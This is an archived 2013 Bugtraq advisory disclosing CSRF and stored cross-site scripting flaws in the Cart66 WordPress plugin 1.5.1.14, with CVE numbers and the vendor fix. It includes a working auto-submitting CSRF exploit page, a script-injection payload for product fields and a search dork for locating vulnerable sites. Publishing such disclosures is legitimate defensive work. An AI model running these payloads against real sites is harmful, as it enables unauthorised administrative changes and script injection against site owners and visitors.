lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 12 Oct 2013 03:42:37 GMT
From: jsibley1@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

# Exploit Title:     Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:      October 12 2013
# Vendor Homepage:   http://cart66.com
# Software Link:     http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on:         Wordpress 3.6.1
# Google-dork:       inurl:/wp-content/plugins/cart66
# CVE (CSRF):        CVE-2013-5977
# CVE (XSS):         CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1
************
*** CSRF ***
************
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

================
Proof of Concept
================

<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' value='absane was here' />
<input type='hidden' name='product[item_number]' id='product-item_number' value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" name='product[price_description]' value='LuLz' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' />
<input type="hidden" id="product-max_price" name='product[max_price]' value='' />
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value=""  />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' />
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' />
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

VULNERABILITY #2
***********************
*** Code Injection  ***
***********************
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields:
* Product name
* Price description

================
Proof of Concept
================
In the vulnerable fields add <script>alert(0)</script> or any other code. The code is placed directly into the database.

Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product.


]....................................[
]..............SOLUTIONS.............[
]....................................[

Update to version 1.5.1.15 or greater.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ